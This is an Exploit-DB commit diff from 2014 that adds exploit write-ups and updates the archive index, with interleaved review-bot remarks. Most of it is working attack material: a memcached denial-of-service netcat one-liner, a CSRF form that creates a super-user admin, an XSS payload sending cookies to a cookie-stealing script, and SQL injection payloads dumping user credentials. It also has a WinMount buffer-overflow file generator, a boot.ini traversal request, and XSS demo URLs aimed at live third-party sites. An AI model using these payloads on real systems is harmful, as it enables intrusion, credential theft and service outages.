Updated 06_25_2014

Offensive Security 2014-06-25 04:38:08 +00:00
parent 8df8a23f16
commit 3e99626f23
15 changed files with 411 additions and 81 deletions


@ -30471,12 +30471,12 @@ id,file,description,date,author,platform,type,port
33820,platforms/php/webapps/33820.txt,"PotatoNews 1.0.2 'nid' Parameter Multiple Local File Include Vulnerabilities",2010-04-07,mat,php,webapps,0
33821,platforms/php/webapps/33821.html,"n-cms-equipe 1.1c.Debug Multiple Local File Include Vulnerabilities",2010-02-24,ITSecTeam,php,webapps,0
33822,platforms/hardware/webapps/33822.sh,"D-link DSL-2760U-E1 - Persistent XSS",2014-06-21,"Yuval tisf Nativ",hardware,webapps,0
33823,platforms/php/webapps/33823.txt,"Wordpress 3.9.1 - CSRF Vulnerability",2014-06-21,"Avinash Thapa",php,webapps,0
33824,platforms/linux/local/33824.c,"Linux Kernel <= 3.13 - Local Privilege Escalation PoC (gid)",2014-06-21,"Vitaly Nikolenko",linux,local,0
33825,platforms/asp/webapps/33825.txt,"Ziggurat Farsi CMS 'id' Parameter Unspecified Cross Site Scripting Vulnerability",2010-04-15,"Pouya Daneshmand",asp,webapps,0
33826,platforms/linux/remote/33826.txt,"TCPDF 4.5.036/4.9.5 'params' Attribute Remote Code Execution Weakness",2010-04-08,apoc,linux,remote,0
33827,platforms/php/webapps/33827.txt,"Istgah For Centerhost 'view_ad.php' Cross-Site Scripting Vulnerability",2010-04-07,indoushka,php,webapps,0
33829,platforms/windows/remote/33829.c,"WinSoftMagic Photo Editor PNG File Buffer Overflow Vulnerability",2010-04-09,eidelweiss,windows,remote,0
33830,platforms/php/webapps/33830.txt,"Lunar CMS 3.3 - CSRF And Stored XSS Vulnerability",2014-06-21,LiquidWorm,php,webapps,0
33832,platforms/php/webapps/33832.txt,"TANDBERG Video Communication Server 4.2.1/4.3.0 Multiple Remote Vulnerabilities",2010-04-12,"Jon Hart",php,webapps,0
33833,platforms/php/webapps/33833.txt,"Blog System 1.x Multiple Input Validation Vulnerabilities",2010-04-12,"cp77fk4r ",php,webapps,0
33834,platforms/php/webapps/33834.txt,"Vana CMS 'filename' Parameter Remote File Download Vulnerability",2010-04-13,"Pouya Daneshmand",php,webapps,0
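Review bot: row 33823 (platforms/php/webapps/33823.txt, "Wordpress 3.9.1 - CSRF Vulnerability") is still listed in this hunk, yet the same commit removes an 80-line file (the @ -1,80 +0,0 hunk below) whose content is that WordPress 3.9.1 CSRF write-up. The rendered view drops the +/- markers, so confirm that the 33823 row is the removed side of this 12/12 hunk rather than retained context; otherwise files.csv points at a file that no longer exists. Minor: the author field on row 33833 carries a trailing space ("cp77fk4r ").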
@ -30485,3 +30485,15 @@ id,file,description,date,author,platform,type,port
33839,platforms/multiple/remote/33839.txt,"Oracle E-Business Suite Financials 12 'jtfwcpnt.jsp' SQL Injection Vulnerability",2010-04-15,"Joxean Koret",multiple,remote,0
33840,platforms/asp/webapps/33840.txt,"Ziggurrat Farsi CMS 'bck' Parameter Directory Traversal Vulnerability",2010-04-15,"Pouya Daneshmand",asp,webapps,0
33841,platforms/windows/remote/33841.txt,"HTTP File Server 2.2 Security Bypass and Denial of Service Vulnerabilities",2010-04-19,"Luigi Auriemma",windows,remote,0
33846,platforms/php/webapps/33846.txt,"ZeroCMS 1.0 - (zero_transact_article.php article_id POST parameter) SQL Injection Vulnerability",2014-06-23,"Filippos Mastrogiannis",php,webapps,0
33847,platforms/multiple/remote/33847.txt,"netkar-PRO 1.1 - Remote Stack Buffer Overflow Vulnerability",2010-04-13,"Luigi Auriemma",multiple,remote,0
33848,platforms/windows/remote/33848.py,"WinMount 3.3.401 ZIP File Remote Buffer Overflow Vulnerability",2010-04-19,lilf,windows,remote,0
33849,platforms/windows/dos/33849.txt,"netKar PRO 1.1 - '.nkuser' File Creation NULL Pointer Denial Of Service Vulnerability",2014-06-13,"A reliable source",windows,dos,0
33850,platforms/linux/dos/33850.txt,"memcached 1.4.2 Memory Consumption Remote Denial of Service Vulnerability",2010-04-27,fallenpegasus,linux,dos,0
33852,platforms/windows/remote/33852.txt,"HTTP 1.1 GET Request Directory Traversal Vulnerability",2010-06-20,chr1x,windows,remote,0
33853,platforms/php/webapps/33853.txt,"Kleophatra CMS 0.1.1 'module' Parameter Cross Site Scripting Vulnerability",2010-04-19,anT!-Tr0J4n,php,webapps,0
33854,platforms/php/webapps/33854.txt,"vBulletin Two-Step External Link Module 'externalredirect.php' Cross-Site Scripting Vulnerability",2010-04-20,"Edgard Chammas",php,webapps,0
33855,platforms/linux/remote/33855.txt,"MIT Kerberos 5 'src/kdc/do_tgs_req.c' Ticket Renewal Double Free Memory Corruption Vulnerability",2010-04-20,"Joel Johnson",linux,remote,0
33856,platforms/php/webapps/33856.txt,"Viennabux Beta! 'cat' Parameter SQL Injection Vulnerability",2010-04-09,"Easy Laster",php,webapps,0
33857,platforms/php/webapps/33857.txt,"e107 0.7.x 'e107_admin/banner.php' SQL Injection Vulnerability",2010-04-21,"High-Tech Bridge SA",php,webapps,0
33858,platforms/php/webapps/33858.txt,"DBSite wb CMS 'index.php' Multiple Cross Site Scripting Vulnerabilities",2010-04-21,The_Exploited,php,webapps,0
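Review bot: row 33849 is dated 2014-06-13 with author "A reliable source" although its file cites securityfocus bid/39558, part of the same April 2010 batch as rows 33847 (bid/39555, 2010-04-13) and 33848 (bid/39557, 2010-04-19), so the date and author read like placeholders and should be brought in line with the rest of the batch. The same product is spelled "netkar-PRO" on 33847 and "netKar PRO" on 33849, and the vendor on 33840 is "Ziggurrat" while the previous hunk's row 33825 has "Ziggurat". Row 33852's title, "HTTP 1.1 GET Request Directory Traversal Vulnerability", names a protocol version rather than the affected product and will not be findable by anyone searching the archive.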

platforms/linux/dos/33850.txt Executable file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/39577/info
memcached is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to cause the application to allocate large amount of memory, hanging or crashing the application.
memcached versions prior to 1.4.3 are affected.
cat /dev/zero | nc -q1 127.0.0.1 11211


@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/39599/info
MIT Kerberos is prone to a remote memory-corruption vulnerability.
An authenticated attacker can exploit this issue by sending specially crafted ticket-renewal requests to a vulnerable computer.
Successfully exploiting this issue can allow the attacker to execute arbitrary code with superuser privileges, completely compromising the affected computer. Failed exploit attempts will result in a denial-of-service condition.
The following proof-of-concept command is available:
% kinit -R
We currently are unaware of any exploits that result in code-execution.
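Review bot: the write-up gives no affected or fixed version range, unlike the sibling entries in this commit ("memcached versions prior to 1.4.3 are affected", "netkar-PRO 1.1 is vulnerable"), and files.csv row 33855 likewise says only "MIT Kerberos 5"; add the affected releases alongside the source path named in the title (src/kdc/do_tgs_req.c) so a reader can tell whether their KDC is in scope. The closing line also undercuts the severity paragraph: it first asserts arbitrary code execution with superuser privileges, then states that no code-execution exploit is known, so the first should be worded as a worst-case outcome rather than a demonstrated one.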


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/39555/info
netkar-PRO is prone to a remote stack-based buffer-overflow vulnerability because it fails to properly bounds-check messages before copying them to an insufficiently sized memory buffer.
Successful exploits can allow remote attackers to execute arbitrary machine code in the context of the user running the application.
netkar-PRO 1.1 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/33847.zip


@ -1,80 +0,0 @@
# EXPLOIT TITLE:Wordpress 3.9.1-CSRF vulnerability
# DATE:21st June,2014
# Author:Avinash Kumar Thapa
#URL: localhost/wordpress/
#PATCH/FIX:Not fixed yet.
###################################################################################################
Technical Details:
This is the new version released by Wordpress.
version is 3.9.1(Latest)
##Cross site request Forgery(CSRF) is present in this version at the url shown:http://localhost/wordpress/wp-comments-post.php##
#####################################################################################################
Exploit Code:
<html>
<!-- CSRF PoC - generated by **Avinash Kumar Thapa** -->
<body>
<form action="http://localhost/wordpress/wp-comments-post.php" method="POST">
<input type="hidden" name="author" value="Anonymous" />
<input type="hidden" name="email" value="helloworld&#64;outlook&#46;com" />
<input type="hidden" name="url" value="www&#46;random&#46;com" />
<input type="hidden" name="comment" value="Cross site request Forgery(CSRF)" />
<input type="hidden" name="submit" value="Post&#32;Comment" />
<input type="hidden" name="comment&#95;post&#95;ID" value="1" />
<input type="hidden" name="comment&#95;parent" value="0" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
###########################################################################################################
----
-- Avinash
a.k.a
**SPID3R**
twitter: @m_avinash143<https://twitter.com/m_avinash143>
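Review bot: the removal is justified by the PoC's own fields: author, email, url, comment, comment_post_ID and comment_parent posted to wp-comments-post.php are exactly WordPress's public comment form, which accepts unauthenticated submissions by design wherever comments are open, so a cross-origin anonymous comment is the documented behaviour rather than a CSRF against any privileged action. The header offers nothing verifiable either (URL is localhost/wordpress/, fix status "Not fixed yet"). Make sure the files.csv row for 33823 is dropped together with this file.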

platforms/php/webapps/33830.txt Executable file

@ -0,0 +1,83 @@
?<!--
Lunar CMS 3.3 CSRF And Stored XSS Vulnerability
Vendor: Lunar CMS
Product web page: http://www.lunarcms.com
Affected version: 3.3
Summary: Lunar CMS is a freely distributable open sourcecontent
management system written for use on servers running the ever so
popular PHP5 & MySQL.
Desc: Lunar CMS suffers from a cross-site request forgery and a
stored xss vulnerabilities. The application allows users to perform
certain actions via HTTP requests without performing any validity
checks to verify the requests. This can be exploited to perform
certain actions with administrative privileges if a logged-in user
visits a malicious web site. Input passed to the 'subject' and 'email'
POST parameters thru the 'Contact Form' extension/module is not properly
sanitised before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in
context of an affected site.
Tested on: Apache/2.4.7 (Win32)
PHP/5.5.6
MySQL 5.6.14
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5188
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5188.php
11.06.2014
-->
CSRF Add Admin
===============
<html>
<body>
<form action="http://localhost/lunarcms/admin/user_create.php" method="POST">
<input type="hidden" name="name" value="Hacker" />
<input type="hidden" name="email" value="lab@zeroscience.mk" />
<input type="hidden" name="password1" value="251ftw" />
<input type="hidden" name="password2" value="251ftw" />
<input type="hidden" name="access" value="0" />
<input type="hidden" name="Submit" value="submit" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
Access levels:
0: Super user
1: Admin
2: Website only
CSRF Stored XSS (Session Hijack)
=================================
<html>
<body>
<form action="http://localhost/lunarcms/admin/extensions.php?ext=contact_form&top" method="POST">
<input type="hidden" name="email" value='"><script>alert(1);</script>' />
<input type="hidden" name="error" value="2" />
<input type="hidden" name="sent" value="1" />
<input type="hidden" name="subject" value='"><script>var x = new Image();x.src='http://www.example.com/cookiethief.php?cookie='+document.cookie;</script>' />
<input type="hidden" name="submit" value="submit" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
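Review bot: the first line opens with a stray "?" before "<!--", almost certainly a byte-order mark mis-encoded on upload; strip it so the file begins with the comment opener. The same paste also produced "sourcecontent" (missing space) in the summary. In the stored-XSS form, the "subject" input nests unescaped single quotes inside a single-quoted value attribute, so the HTML as committed does not parse the way its header describes; the entry should at least say the form is illustrative. The "Access levels" legend is useful and explains why the add-admin form sets access=0; keep it next to that form.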

platforms/php/webapps/33846.txt Executable file

@ -0,0 +1,93 @@
ZeroCMS v1.0 SQL Injection Vulnerability (zero_transact_article.php article_id POST parameter)
Vendor: Another Awesome Stuff
Product web page: http://www.aas9.in/zerocms
Affected version: 1.0
Severity: High
CWE: 89 - http://cwe.mitre.org/data/definitions/89.html
CVE: CVE-2014-4194
Date: 20/06/2014
Discovered by: Filippos Mastrogiannis (@filipposmastro)
--------------------------------------------------------
ZeroCMS is a very simple Content Management System Built using PHP and MySQL.
Description: ZeroCMS v1.0 is vulnerable to SQL Injection.
The user input which is passed via the "article_id" POST parameter of "zero_transact_article.php"
is not properly sanitised allowing the attacker to inject arbitrary sql code and to
execute queries to the database in order to extract sensitive information (e.g. credentials) and/or
to take over the database/system.
Proof Of Concept:
A part of the sqlmap output:
POST parameter 'article_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 261 HTTP(s) requests:
---
Place: POST
Parameter: article_id
..
...
....
---
[XX:XX:XX] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0
[XX:XX:XX] [INFO] fetching current database
current database: 'zero'
..
...
....
--------------------------------------------------------
Proof Of Concept:
Request:
POST /zerocms/zero_transact_article.php HTTP/1.1
Cache-Control: no-cache
Referer: http://[Removed]/zerocms/zero_comment.php?article_id=9
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Accept-Language: en-us,en;q=0.5
Host: [Removed]
Cookie: PHPSESSID=[Removed]
Accept-Encoding: gzip, deflate
Content-Length: 53
Content-Type: application/x-www-form-urlencoded
action=Submit+Comment&article_id='&comment_text=3
Response:
HTTP/1.1 200 OK
Date: [Removed]
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Expires: [Removed]
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 226
Content-Type: text/html
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '', 3, "2014-XX-XX XX:XX:XX", ' at line 4
--------------------------------------------------------
Exploitation:
For example if we want to extract: user_id, email, password from the database use the following payload in the article_id parameter of the POST request:
action=Submit+Comment&article_id=5+and+(select 1 FROM(select count(*),concat((select+concat(email,0x3a,user_id,0x3a,password,0x3a) FROM zero_users LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)&comment_text=3
(The database name in our setup is: zero & the session is from an authenticated user)
If we look at the response we can see the extracted data:
Duplicate entry 'admin@domain.com:1:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19:1' for key 'group_key'
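Review bot: the header date (20/06/2014) disagrees with the files.csv row for 33846 (2014-06-23); pick one. "Proof Of Concept:" appears twice as a heading, once over the trimmed sqlmap output and once over the captured request, so retitle the first. In the captured request, Content-Length: 53 does not match the 49-byte body shown (action=Submit+Comment&article_id='&comment_text=3), which means the body was edited after capture; either keep captures verbatim or drop the header so the sample stays internally consistent.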

platforms/php/webapps/33853.txt Executable file

@ -0,0 +1,43 @@
source: http://www.securityfocus.com/bid/39593/info
Kleophatra CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Kleophatra CMS 0.1.1 is vulnerable; other versions may also be affected.
# Exploit Title:[ Kleophatra CMS XSS Vulnerability ]
# Date: [19/4/2010]
# My home :www.Dev-Point.com
# Author: [anT!-Tr0J4n]
# Software Link:[http://portal.kleophatra.org]
=====[ Exploit XSS ]======
[>>]Exploit :
index.php?module=[ Xss ]
http://localhost/kleo/index.php?module=1<script>alert(document.cookie)</script>
http://localhost/kleo/?module=1<script>alert(404997209751)</script>
[>>] Exampel :
http://portal.kleophatra.org/index.php?module=1<script>alert(document.cookie)</script>
========================
Site: www.Dev-PoinT.com
Author : anT!-Tr0J4n
EmaiL : anTi-TroJan@Hotmail.com
GreeTz To:Dev-P0!nT T34M /GlaDiatOr/ProfessionaL/SILVER STAR/Coffin Of Evil
R3d-D3v1l/HoBeeZ/mahmoudvip/Mr.Mh$TEr / And All My Frindes $
==========================
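Review bot: the "Exampel" line aims the PoC at the vendor's live portal (http://portal.kleophatra.org/...), whereas the other entries in this commit use http://www.example.com or localhost; the archive should not carry URLs pointed at a third party's production host, so replace it with a placeholder. The preceding "Exploit" lines already show the same pattern against localhost, so the live example adds nothing. The greetz and signature block is noise and can be dropped, and "Exampel" is a typo.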


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/39597/info
Two-Step External Link module for vBulletin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/externalredirect.php?url=XSS


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/39602/info
Viennabux Beta! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following example URI is available:
http://www.example.com/forum/view_topic.php?cat=1+union+select+1,concat(aUsername,0x3a,apassword),3,4,5,6,7+from+admins


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/39609/info
e107 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
<form action=http://host/e107_admin/banner.php method=POST name=f> <input type=hidden name=createbanner value="Create+New+Banner" > <input type=hidden name=click_url value="' ANY_SQL_HERE " > </form> <script> document.f.submit(); </script>
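Review bot: this entry omits the affected-version sentence that the other bid-sourced files in the commit carry ("X is vulnerable; other versions may also be affected"); files.csv row 33857 says e107 0.7.x, so state that here too. The form is a single unbroken line with unquoted attributes and a placeholder (ANY_SQL_HERE); breaking it across lines would make the fields readable without changing what it documents.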

platforms/php/webapps/33858.txt Executable file

@ -0,0 +1,58 @@
source: http://www.securityfocus.com/bid/39613/info
DBSite wb CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
=========================================
DBSite w/b CMS Multiple XSS Vulnerability
=========================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /&#039; \ __ /&#039;__`\ /\ \__ /&#039;__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /&#039; _ `\ \/\ \/_/_\_<_ /&#039;___\ \ \/\ \ \ \ \/\`&#039;__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################### 1
0 I&#039;m The_Exploited member from Inj3ct0r Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] Discovered By: The_Exploited
@Title: DBSite w/b CMS Multiple XSS Vulnerability
@Author: The_Exploited aka l3d aka Spoof
@Mail: spoof@live.it
@Site: http://site.securityspl0its.com/ - http://forum.securityspl0its.com/
@Exploit: "><script>alert(document.cookie);</script>
@Demo 1: http://www.mysite.com/dbsite/index.php?page=default&id=1&&lang=[XSS]
@Demo 2: http://www.mysite.com/dbsite/index.php?page=default&id=1&lang=&[PATH]=[XSS]
@Demo online 1: http://www.pratoturismo.it/index.php?page=default&id=8&lang=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
@Demo online 2: http://www.pratoturismo.it/index.php?page=default&id=16&lang=&comune=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
@CMS Version: All
@CMS Download: http://www.liberologico.com/www/index.php?idx_menu=2&idx_subMenu=0&ID_scheda=31
# Inj3ct0r.com [2010-04-21]
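Review bot: apostrophes throughout the banner and signature are HTML-escaped (&#039; on the art lines, "I&#039;m" in the team line), which shows the text was copied from a rendered web page rather than the original plaintext; unescape it before committing. The two "Demo online" URLs target a live third-party site (www.pratoturismo.it) and should use the placeholder host already used by "Demo 1" and "Demo 2" (www.mysite.com). "@CMS Version: All" is not an affected-version statement; give the versions tested or say they are unknown.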


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/39558/info
netKar PRO is prone to a remote denial-of-service vulnerability because it fails to adequately sanitize user-supplied input.
Exploiting this issue will cause the server to copy data to a NULL pointer, which will crash the server, denying access to legitimate users.
netKar PRO 1.1 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/33849.zip


@ -0,0 +1,49 @@
source: http://www.securityfocus.com/bid/39557/info
WinMount is prone to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will result in a denial-of-service condition.
WinMount 3.3.0401 is vulnerable; other versions may be affected.
import os
sploitfile="test.zip"
ldf_header =('\x50\x4B\x03\x04\x14\x00\x00'
'\x00\x08\x00\xB7\xAC\xCE\x34\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
'\xd0\xff'
'\x00\x00\x00')
cdf_header = ("\x50\x4B\x01\x02\x14\x00\x14"
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xd0\xff"
"\x00\x00\x00\x00\x00\x00\x01\x00"
"\x24\x00\x00\x00\x00\x00\x00\x00")
eofcdf_header = ("\x50\x4B\x05\x06\x00\x00\x00"
"\x00\x01\x00\x01\x00"
"\xfe\xff\x00\x00"
"\xee\xff\x00\x00"
"\x00\x00")
print "[+] Preparing payload\n"
size=65484
junk='A'*420
nseh='\x89\x8a\x8b\x8c'
seh='\x84\x5b\xac\x8d'
junk_='A'*33
jumpto='\x05\x12\x11\x46\x2d\x11\x11\x46\x50\x46\xac\xe4'#make eax point to shellcode and jump to shellcode
shellcode=("the shellcode here will be changed into unicode")#encode by alpha2
junk__='B'*80
last='C'*(size-420-len(nseh+seh+junk_+jumpto+junk__+shellcode))
payload=junk+nseh+seh+junk_+jumpto+junk__+shellcode+last+".wav"
evilzip = ldf_header+payload+cdf_header+payload+eofcdf_header
print "[+] Removing old zip file\n"
os.system("del "+sploitfile)
print "[+] Writing payload to file\n"
fobj=open(sploitfile,"w",0)
fobj.write(evilzip)
print "generate zip file "+(sploitfile)
fobj.close()
print '[+] Wrote %d bytes to file sploitfile\n'%(len(evilzip))
print "[+] Payload length :%d \n"%(len(payload))
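Review bot: the script is Python 2 only (print statements) and writes the archive in text mode (open(sploitfile,"w",0)); on Windows, which the preceding os.system("del "+sploitfile) assumes, text mode rewrites any 0x0A byte inside the ZIP structures as CR LF, so "wb" is the correct mode, and with "w"/"wb" already truncating, the del call is redundant. The last-but-one print reports "Wrote %d bytes to file sploitfile" with the literal word sploitfile instead of the variable's value. The shellcode variable is a placeholder string ("the shellcode here will be changed into unicode"), so the header should describe the file as a template rather than a working PoC.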


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/39590/info
The HTTP application is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to view arbitrary local files and directories within the context of the webserver. Information harvested may aid in launching further attacks.
HTTP 1.1 is vulnerable; other versions may also be affected.
GET /..\..\\..\..\\..\..\\..\..\\\boot.ini HTTP/1.0
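Review bot: the write-up never names the affected software: "The HTTP application" and "HTTP 1.1 is vulnerable; other versions may also be affected" describe the protocol, not a product, and files.csv row 33852 carries the same non-title, so nobody can match this entry to anything they run; recover the product name from the cited source (bid/39590) and put it in both places. The request line also uses HTTP/1.0 while the text claims HTTP 1.1, and the requested file (boot.ini) implies a Windows host, which only the platform column says.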